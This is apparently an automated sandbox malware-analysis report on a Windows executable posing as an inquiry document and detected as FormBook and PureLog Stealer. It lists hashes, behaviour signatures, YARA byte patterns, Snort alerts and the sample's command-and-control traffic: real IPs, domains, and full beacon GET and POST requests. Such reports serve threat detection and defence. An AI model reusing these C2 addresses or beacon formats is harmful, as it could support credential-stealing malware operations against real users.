Windows Analysis Report
INQ No. HDPE-16-GM-00- PI-INQ-3001.exe

Overview

General Information

Sample name: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
Analysis ID: 1431986
MD5: a20e41f9774504d4bace9a2a8a7989c6
SHA1: b7e082069f682b7e35325e53f204d7216573e1e5
SHA256: e20de80a71ce98da7d15176e36f66326ca635c42726f29e87ed0c4b01d2937e7
Tags: exe, Formbook

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • INQ No. HDPE-16-GM-00- PI-INQ-3001.exe (PID: 6188 cmdline: "C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe" MD5: A20E41F9774504D4BACE9A2A8A7989C6)
    • INQ No. HDPE-16-GM-00- PI-INQ-3001.exe (PID: 5652 cmdline: "C:\Users\user\Desktop\INQ No. HDPE-16-GM-00- PI-INQ-3001.exe" MD5: A20E41F9774504D4BACE9A2A8A7989C6)
      • yTVsQcNOAKqLIKj.exe (PID: 3652 cmdline: "C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • replace.exe (PID: 7644 cmdline: "C:\Windows\SysWOW64\replace.exe" MD5: A7F2E9DD9DE1396B1250F413DA2F6C08)
          • yTVsQcNOAKqLIKj.exe (PID: 2912 cmdline: "C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7876 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • WerFault.exe (PID: 5376 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 1380 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000000.00000002.1436066446.0000000004219000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000016.00000002.3686434671.00000000058F0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000016.00000002.3686434671.00000000058F0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x4ba74:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x35043:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000015.00000002.3676564826.0000000002930000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000015.00000002.3676564826.0000000002930000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a8f0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13ebf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Source | Rule | Description | Author | Strings
4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2dd83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17352:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.91b0000.6.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.4219970.3.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.91b0000.6.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

No Sigma rule has matched

Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
04/26/24-07:43:47.579767 | 2855465 | 49754 | 80 | TCP | A Network Trojan was detected
04/26/24-07:42:55.058046 | 2855465 | 49742 | 80 | TCP | A Network Trojan was detected
04/26/24-07:44:17.207461 | 2855465 | 49762 | 80 | TCP | A Network Trojan was detected
04/26/24-07:43:33.153696 | 2855465 | 49750 | 80 | TCP | A Network Trojan was detected
04/26/24-07:44:31.943894 | 2855465 | 49766 | 80 | TCP | A Network Trojan was detected
04/26/24-07:44:03.097055 | 2855465 | 49758 | 80 | TCP | A Network Trojan was detected
04/26/24-07:44:57.056116 | 2855465 | 49770 | 80 | TCP | A Network Trojan was detected
04/26/24-07:41:37.699114 | 2855465 | 49722 | 80 | TCP | A Network Trojan was detected
04/26/24-07:42:10.721609 | 2855465 | 49730 | 80 | TCP | A Network Trojan was detected
04/26/24-07:42:25.701478 | 2855465 | 49734 | 80 | TCP | A Network Trojan was detected
04/26/24-07:43:18.530145 | 2855465 | 49746 | 80 | TCP | A Network Trojan was detected

                AV Detection

                Source: www.onitsuka-ksa.com, Virustotal: Detection: 13%
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, ReversingLabs: Detection: 31%
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, Virustotal: Detection: 50%
                Source: Yara matchFile source: 4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.INQ No. HDPE-16-GM-00- PI-INQ-3001.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000016.00000002.3686434671.00000000058F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3676564826.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1483242441.0000000000E40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1482586968.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3683794972.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3683904439.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.3683910951.0000000003AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1485407481.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeJoe Sandbox ML: detected
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Data.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Configuration.pdbL0vw# source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Xml.ni.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: Accessibility.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.ni.pdbRSDS source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: Nfo.pdb/l source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: wntdll.pdbUGP source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000015.00000003.1482858607.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000015.00000002.3684257508.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000015.00000002.3684257508.0000000003260000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000015.00000003.1484866148.00000000030B9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Nfo.pdbSHA256 source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                Source: Binary string: wntdll.pdb source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000004.00000002.1483417927.0000000000EA0000.00000040.00001000.00020000.00000000.sdmp, replace.exe, replace.exe, 00000015.00000003.1482858607.0000000002EEF000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000015.00000002.3684257508.00000000033FE000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000015.00000002.3684257508.0000000003260000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000015.00000003.1484866148.00000000030B9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: mscorlib.ni.pdbRSDS source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Data.ni.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Configuration.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Xml.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Core.ni.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Core.pdb0 source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Windows.Forms.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Xml.pdbH source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: Accessibility.pdbH source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: replace.pdb source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000004.00000002.1483046509.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000014.00000003.1422664524.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000014.00000002.3683034246.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: replace.pdbGCTL source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, 00000004.00000002.1483046509.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000014.00000003.1422664524.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000014.00000002.3683034246.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: yTVsQcNOAKqLIKj.exe, 00000014.00000002.3681295936.000000000081E000.00000002.00000001.01000000.0000000D.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3676563053.000000000081E000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: System.Drawing.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: mscorlib.ni.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Data.ni.pdbRSDS source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: Nfo.pdb source: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe, WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.pdb4 source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Core.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.ni.pdb source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Data.pdb, source: WER20C2.tmp.dmp.7.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WER20C2.tmp.dmp.7.dr
                Source: C:\Windows\SysWOW64\replace.exeCode function: 21_2_0294BC00 FindFirstFileW,FindNextFileW,FindClose,21_2_0294BC00
                Source: C:\Windows\SysWOW64\replace.exeCode function: 4x nop then xor eax, eax21_2_02939460
                Source: C:\Windows\SysWOW64\replace.exeCode function: 4x nop then pop edi21_2_0294210D

                Networking

                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49722 -> 79.98.25.1:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49730 -> 64.190.62.22:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49734 -> 217.76.128.34:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49742 -> 178.211.137.59:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49746 -> 203.161.46.103:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49750 -> 205.234.233.38:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49754 -> 162.240.81.18:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49758 -> 103.93.124.160:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49762 -> 91.195.240.19:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49766 -> 3.125.172.46:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.7:49770 -> 91.195.240.19:80
                Source: DNS query: www.www60270.xyz
                Source: Joe Sandbox ViewIP Address: 162.240.81.18 162.240.81.18
                Source: Joe Sandbox ViewIP Address: 79.98.25.1 79.98.25.1
                Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                Source: Joe Sandbox ViewASN Name: SERVERCENTRALUS SERVERCENTRALUS
                Source: Joe Sandbox ViewASN Name: RACKRAYUABRakrejusLT RACKRAYUABRakrejusLT
                Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
                Source: Joe Sandbox ViewASN Name: TIS-DIALOG-ASRU TIS-DIALOG-ASRU
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /aleu/?MzYDklf=ok/gmcxpcerYYESWh7Vklw9Bm7swo7gbVWXcVokfXup7b9fdD39fjj06OXsQXJEXHKhiFziBALjD8i0StjfBY6tcFTr5ihP/i1r4jMGBPezmBbp/yafvkg2ntS8iiyqpI2uarI9tc8j7&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.maxiwalls.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?MzYDklf=jXFvQTK4oWsNW5HaVP0aKlBegUUeN16TTlZ8jbhw/9BHTw5yM7uncTfMOk5Q960TVKfivgiXqRpaWw5bUpeZnRruwwT6g/D0s8W22E0wG3Y43Svl+j8+gYa6G242ZIg/F531ut75LnnH&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.paydayloans3.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?MzYDklf=heiUU9lLv45IJG5Wd6LJBmuSZbtDNHx122KPvL/NNDCzNkInOevyA08bejzsewnbLAKBPzZGyeY+skKwUglop6X2S27Gspv7OD0R2VJ9wdDlZRLUHIVLQGAdIrEvlBBmGQJQcRJvk2sI&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.colchondealquiler.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?MzYDklf=N0v49flUUQfEWOo/aE7OdIaJv4xdfmBs7J9ivEb+Xo+Q/nq/YMDO//KjhQmhbqKlUVaao73nPs1gVWG10w4sN/a7W8oTa9PDfIw3FkTWG11zhaPiohVHadQfG1I8c2eUqprtDPLWhOJ9&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.skibinscy-finanse.plConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?MzYDklf=1EzsQVnX0vVrGxBYNXB1u7fNxljhjRHJWEXTYZCw6Y45y9QSTO9z6ggEQaWzMFMNeg7sTl3Zf11WKrZHAcHpX9hrZ8kVd6B8qbB5+OCtdAqRU7IipAokYiIG2rDB/a+dgcBIv0Zff4BY&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.fairmarty.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?MzYDklf=KKNe6rdgfNo6Wq6sMccsECj9DruDiqz0V/YBvfR/8knlzlDvcza3RWVYHFV7uOHMzESi0Z4HuGcox/fHqa9ciWlD8AlULX7tFKEX0vEvV/3H5nGwz5PpKkk9QKafXX45AA2PEYjdzWMv&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.theertyuiergthjk.homesConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?MzYDklf=mEhw182mTcvL4X7W6yJhLslIcG+j3Kkb/q8jOnfIToCvkLfDcLYfug01ytzddJhX/lijb8hpDT2F8KzL6RC5GrlDAC6fqoF7t8GqbmfMFKfVEQELjrUu0IX3uTvnqRm05V4BpU+RhfzS&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.aprovapapafox.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?MzYDklf=/mfxaTJBOgt3JDZkoxaXbiWRJO3cof11tbJm5eA1/p+8DdahBUuKuoWdPETp4wIg5O58ph7A0hS6+wjYiiGEtJ1bmNcMNYXAdylBBvNZ9o6IpjigtOzYHQeGXYHcYUjCnGBIU602CyDs&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.83634.cnConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?MzYDklf=dYsxpTaff089Ev8jBScoXXc5jj7jmMQs0q0Eu2dlyBwZckm7Y/SiQVQbLF6BJ7sO5g5GU6+4isz0GnabBFwpFqtsgzPEUtDw4CvXwSk6GQMDGBmxey3onV8TCNPZOIX4PotVszp0FWYE&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.polhi.lolConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?MzYDklf=qJYbYwaLgLDJAMSHMJQaEOr73chNsD5VMq73qeoAA4dzyQoAh+hTVoh+ah/e183iVnKHGTOXkcX7G8t3YRyjXe/ogXVNID+KtV4n0lPZ2DbPfuvRPmVg0GTYTl/4fOclA5m+2/uM8Ymx&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.valentinaetommaso.itConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /aleu/?MzYDklf=Fsk+9Ugrf6MFs9mchnETM+3QD2cthhCQsqu2PahB1CBPiKPkA/hmNXSF9ivWSGs/4CiX0i2cy0l6l8SVSxzUF3Q4RMAPDGkyPIDahDw1KMSvyAVfpPYGa57LB1vixmbDZ7oyoAgNkZW7&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.solesense.proConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.maxiwalls.com
                Source: global trafficDNS traffic detected: DNS query: www.choosejungmann.com
                Source: global trafficDNS traffic detected: DNS query: www.paydayloans3.shop
                Source: global trafficDNS traffic detected: DNS query: www.colchondealquiler.com
                Source: global trafficDNS traffic detected: DNS query: www.www60270.xyz
                Source: global trafficDNS traffic detected: DNS query: www.skibinscy-finanse.pl
                Source: global trafficDNS traffic detected: DNS query: www.avoshield.com
                Source: global trafficDNS traffic detected: DNS query: www.fairmarty.top
                Source: global trafficDNS traffic detected: DNS query: www.theertyuiergthjk.homes
                Source: global trafficDNS traffic detected: DNS query: www.aprovapapafox.com
                Source: global trafficDNS traffic detected: DNS query: www.83634.cn
                Source: global trafficDNS traffic detected: DNS query: www.polhi.lol
                Source: global trafficDNS traffic detected: DNS query: www.valentinaetommaso.it
                Source: global trafficDNS traffic detected: DNS query: www.toyzonetshirts.com
                Source: global trafficDNS traffic detected: DNS query: www.solesense.pro
                Source: global trafficDNS traffic detected: DNS query: www.onitsuka-ksa.com
                Source: unknownHTTP traffic detected: POST /aleu/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.paydayloans3.shopOrigin: http://www.paydayloans3.shopContent-Type: application/x-www-form-urlencodedContent-Length: 220Cache-Control: max-age=0Connection: closeReferer: http://www.paydayloans3.shop/aleu/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36Data Raw: 4d 7a 59 44 6b 6c 66 3d 75 56 74 50 54 6a 69 4f 39 6b 59 30 4a 72 62 59 4c 70 74 65 4c 56 6b 63 69 46 55 64 65 54 43 57 66 6e 5a 72 71 72 70 32 34 4e 74 30 66 54 46 47 4e 4c 66 55 64 32 6e 57 4a 56 73 59 37 4c 56 6d 53 59 33 67 32 41 57 4a 33 52 39 2b 45 6e 39 36 50 34 48 4c 77 42 33 4c 32 67 58 70 32 71 48 48 76 70 57 49 6b 52 55 59 51 45 51 70 70 47 2b 42 2f 51 73 47 70 37 79 30 46 57 77 4d 64 4b 68 34 45 2b 50 2b 6a 50 53 36 45 43 66 6c 4c 43 6f 45 35 2b 54 41 47 74 59 65 42 75 35 37 62 79 38 43 59 70 64 43 64 74 48 32 55 41 6a 41 78 6e 44 6c 48 2b 61 42 61 71 75 2f 79 6f 30 67 75 53 59 34 59 57 67 39 49 41 4b 46 32 66 54 78 62 43 38 75 31 67 3d 3d Data Ascii: MzYDklf=uVtPTjiO9kY0JrbYLpteLVkciFUdeTCWfnZrqrp24Nt0fTFGNLfUd2nWJVsY7LVmSY3g2AWJ3R9+En96P4HLwB3L2gXp2qHHvpWIkRUYQEQppG+B/QsGp7y0FWwMdKh4E+P+jPS6ECflLCoE5+TAGtYeBu57by8CYpdCdtH2UAjAxnDlH+aBaqu/yo0guSY4YWg9IAKF2fTxbC8u1g==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Apr 2024 05:42:17 GMTServer: ApacheX-ServerIndex: llim605Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 